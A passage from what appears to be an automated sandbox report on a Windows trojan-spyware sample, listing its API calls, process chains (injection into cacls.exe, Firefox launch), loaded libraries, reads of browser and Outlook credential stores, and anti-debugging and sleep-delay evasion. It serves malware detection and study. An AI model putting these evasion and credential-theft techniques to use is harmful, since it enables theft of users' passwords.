                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852B80 NtQueryInformationFile,9_2_03852B80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852AB0 NtWaitForSingleObject,9_2_03852AB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852F90 NtProtectVirtualMemory,9_2_03852F90
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852FA0 NtQuerySection,9_2_03852FA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852F60 NtCreateProcessEx,9_2_03852F60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852EA0 NtAdjustPrivilegesToken,9_2_03852EA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852E30 NtWriteVirtualMemory,9_2_03852E30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852DB0 NtEnumerateKey,9_2_03852DB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852D00 NtSetInformationFile,9_2_03852D00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852CC0 NtQueryVirtualMemory,9_2_03852CC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852CF0 NtOpenProcess,9_2_03852CF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03852C00 NtQueryInformationProcess,9_2_03852C00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03853090 NtSetValueKey,9_2_03853090
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03853010 NtOpenDirectoryObject,9_2_03853010
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03853D10 NtOpenProcessToken,9_2_03853D10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_03853D70 NtOpenThread,9_2_03853D70
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BF9560 NtCreateFile,9_2_00BF9560
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BF96D0 NtReadFile,9_2_00BF96D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BF97D0 NtDeleteFile,9_2_00BF97D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BF9870 NtClose,9_2_00BF9870
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BF99D0 NtAllocateVirtualMemory,9_2_00BF99D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0360F813 NtMapViewOfSection,9_2_0360F813
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0360F8BA NtUnmapViewOfSection,9_2_0360F8BA
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0360E3AB9_2_0360E3AB
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_036152C49_2_036152C4
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0360E2889_2_0360E288
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0360E7439_2_0360E743
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_036154559_2_03615455
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0360CAC39_2_0360CAC3
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_0360D8089_2_0360D808
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 0388EA12 appears 86 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 0380B970 appears 277 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 03867E54 appears 111 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 03855130 appears 58 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 0389F290 appears 105 times
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: String function: 00F8B970 appears 277 times
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: String function: 0100EA12 appears 86 times
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: String function: 00FD5130 appears 58 times
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: String function: 0101F290 appears 105 times
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: String function: 00FE7E54 appears 111 times
                Source: PGK60fNNCZ.exeBinary or memory string: OriginalFilename vs PGK60fNNCZ.exe
                Source: PGK60fNNCZ.exe, 00000000.00000002.1330153761.0000000003839000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PGK60fNNCZ.exe
                Source: PGK60fNNCZ.exe, 00000000.00000002.1327100482.0000000002898000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs PGK60fNNCZ.exe
                Source: PGK60fNNCZ.exe, 00000000.00000002.1339554761.00000000058E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs PGK60fNNCZ.exe
                Source: PGK60fNNCZ.exe, 00000000.00000002.1340559054.0000000006E50000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PGK60fNNCZ.exe
                Source: PGK60fNNCZ.exe, 00000000.00000002.1325984551.0000000000A6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PGK60fNNCZ.exe
                Source: PGK60fNNCZ.exe, 00000000.00000000.1295556947.00000000004EC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameKThWG.exeL vs PGK60fNNCZ.exe
                Source: PGK60fNNCZ.exe, 00000006.00000002.1865960377.000000000108D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PGK60fNNCZ.exe
                Source: PGK60fNNCZ.exe, 00000006.00000002.1865306695.0000000000A28000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCACLS.EXEj% vs PGK60fNNCZ.exe
                Source: PGK60fNNCZ.exeBinary or memory string: OriginalFilenameKThWG.exeL vs PGK60fNNCZ.exe
                Source: PGK60fNNCZ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PGK60fNNCZ.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/2@5/4
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PGK60fNNCZ.exe.logJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeMutant created: NULL
                Source: C:\Windows\SysWOW64\cacls.exeFile created: C:\Users\user~1\AppData\Local\Temp\t577G2K6Jump to behavior
                Source: PGK60fNNCZ.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: cacls.exe, 00000009.00000002.2550025861.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000009.00000002.2550025861.0000000003436000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000009.00000003.2051969252.0000000003411000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000009.00000003.2049541889.0000000003407000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000009.00000002.2550025861.0000000003407000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PGK60fNNCZ.exeReversingLabs: Detection: 68%
                Source: PGK60fNNCZ.exeVirustotal: Detection: 79%
                Source: unknownProcess created: C:\Users\user\Desktop\PGK60fNNCZ.exe "C:\Users\user\Desktop\PGK60fNNCZ.exe"
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess created: C:\Users\user\Desktop\PGK60fNNCZ.exe "C:\Users\user\Desktop\PGK60fNNCZ.exe"
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess created: C:\Users\user\Desktop\PGK60fNNCZ.exe "C:\Users\user\Desktop\PGK60fNNCZ.exe"Jump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: PGK60fNNCZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PGK60fNNCZ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cacls.pdbGCTL source: PGK60fNNCZ.exe, 00000006.00000002.1865306695.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, QxPduTOtZWkp.exe, 00000008.00000002.2550234246.0000000000C98000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cacls.pdb source: PGK60fNNCZ.exe, 00000006.00000002.1865306695.0000000000A28000.00000004.00000020.00020000.00000000.sdmp, QxPduTOtZWkp.exe, 00000008.00000002.2550234246.0000000000C98000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QxPduTOtZWkp.exe, 00000008.00000000.1787927028.00000000007FE000.00000002.00000001.01000000.0000000D.sdmp, QxPduTOtZWkp.exe, 0000000C.00000002.2548675572.00000000007FE000.00000002.00000001.01000000.0000000D.sdmp
                Source: Binary string: wntdll.pdbUGP source: PGK60fNNCZ.exe, 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000009.00000003.1865016088.0000000003485000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000009.00000003.1867375010.0000000003632000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PGK60fNNCZ.exe, PGK60fNNCZ.exe, 00000006.00000002.1865960377.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000009.00000002.2553266159.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000009.00000003.1865016088.0000000003485000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000009.00000002.2553266159.000000000397E000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000009.00000003.1867375010.0000000003632000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 0_2_027CE520 push eax; retf 0_2_027CE521
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 0_2_059BC160 push es; iretd 0_2_059BC161
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 0_2_059B2D7F push es; iretd 0_2_059B2D8E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 0_2_059B6830 pushad ; iretd 0_2_059B6837
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_004148D4 push cs; iretd 6_2_004148D7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0042E1F3 push edi; ret 6_2_0042E1FC
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00419391 push cs; retf 6_2_00419392
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0040AD51 push ebx; retf 6_2_0040AD54
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00411D86 push ds; retf 6_2_00411D9F
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_0040ADAF push ebx; retf 6_2_0040AD54
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_004035B0 push eax; ret 6_2_004035B2
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00404E90 push eax; ret 6_2_00404EA9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F6225F pushad ; ret 6_2_00F627F9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F627FA pushad ; ret 6_2_00F627F9
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F6283D push eax; iretd 6_2_00F62858
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F909AD push ecx; mov dword ptr [esp], ecx6_2_00F909B6
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F61368 push eax; iretd 6_2_00F61369
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_037E225F pushad ; ret 9_2_037E27F9
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_037E27FA pushad ; ret 9_2_037E27F9
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_038109AD push ecx; mov dword ptr [esp], ecx9_2_038109B6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_037E283D push eax; iretd 9_2_037E2858
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_037E1366 push eax; iretd 9_2_037E1369
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BDE7D3 push ds; retf 9_2_00BDE7EC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BE8844 push FFFFFF8Ah; ret 9_2_00BE8859
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BFAC40 push edi; ret 9_2_00BFAC49
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BD779E push ebx; retf 9_2_00BD77A1
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BD77FC push ebx; retf 9_2_00BD77A1
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BD18DD push eax; ret 9_2_00BD18F6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BE5DDE push cs; retf 9_2_00BE5DDF
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BEDD41 push ds; iretd 9_2_00BEDD5C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BEBE41 push ss; iretd 9_2_00BEBE42
                Source: PGK60fNNCZ.exeStatic PE information: section name: .text entropy: 7.791656574415995
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                Source: Yara matchFile source: Process Memory Space: PGK60fNNCZ.exe PID: 7428, type: MEMORYSTR
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFB2CECD324
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFB2CECD7E4
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFB2CECD944
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFB2CECD504
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFB2CECD544
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFB2CECD1E4
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFB2CED0154
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFB2CECDA44
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeMemory allocated: E70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeMemory allocated: 2830000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeMemory allocated: 7040000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeMemory allocated: 8040000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeMemory allocated: 81D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeMemory allocated: 91D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FD096E rdtsc 6_2_00FD096E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeWindow / User API: threadDelayed 9330Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeWindow / User API: threadDelayed 643Jump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\cacls.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exe TID: 7448Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 3540Thread sleep count: 9330 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 3540Thread sleep time: -18660000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 3540Thread sleep count: 643 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 3540Thread sleep time: -1286000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe TID: 4036Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 9_2_00BEC940 FindFirstFileW,FindNextFileW,FindClose,9_2_00BEC940
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\cacls.exe Process queried: DebugPort
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exe Code function: 6_2_00FD096E rdtsc 6_2_00FD096E
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exe Code function: 6_2_00417E43 LdrLoadDll,6_2_00417E43
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE443 mov eax, dword ptr fs:[00000030h]6_2_00FCE443
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE443 mov eax, dword ptr fs:[00000030h]6_2_00FCE443
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE443 mov eax, dword ptr fs:[00000030h]6_2_00FCE443
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCE443 mov eax, dword ptr fs:[00000030h]6_2_00FCE443
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCA430 mov eax, dword ptr fs:[00000030h]6_2_00FCA430
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8E420 mov eax, dword ptr fs:[00000030h]6_2_00F8E420
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8E420 mov eax, dword ptr fs:[00000030h]6_2_00F8E420
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8E420 mov eax, dword ptr fs:[00000030h]6_2_00F8E420
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F8C427 mov eax, dword ptr fs:[00000030h]6_2_00F8C427
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC8402 mov eax, dword ptr fs:[00000030h]6_2_00FC8402
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC8402 mov eax, dword ptr fs:[00000030h]6_2_00FC8402
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FC8402 mov eax, dword ptr fs:[00000030h]6_2_00FC8402
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCC5ED mov eax, dword ptr fs:[00000030h]6_2_00FCC5ED
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FCC5ED mov eax, dword ptr fs:[00000030h]6_2_00FCC5ED
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F925E0 mov eax, dword ptr fs:[00000030h]6_2_00F925E0
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]6_2_00FBE5E7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]6_2_00FBE5E7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]6_2_00FBE5E7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]6_2_00FBE5E7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]6_2_00FBE5E7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]6_2_00FBE5E7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]6_2_00FBE5E7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FBE5E7 mov eax, dword ptr fs:[00000030h]6_2_00FBE5E7
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01016420 mov eax, dword ptr fs:[00000030h]6_2_01016420
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01016420 mov eax, dword ptr fs:[00000030h]6_2_01016420
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01016420 mov eax, dword ptr fs:[00000030h]6_2_01016420
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01016420 mov eax, dword ptr fs:[00000030h]6_2_01016420
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01016420 mov eax, dword ptr fs:[00000030h]6_2_01016420
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01016420 mov eax, dword ptr fs:[00000030h]6_2_01016420
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_01016420 mov eax, dword ptr fs:[00000030h]6_2_01016420
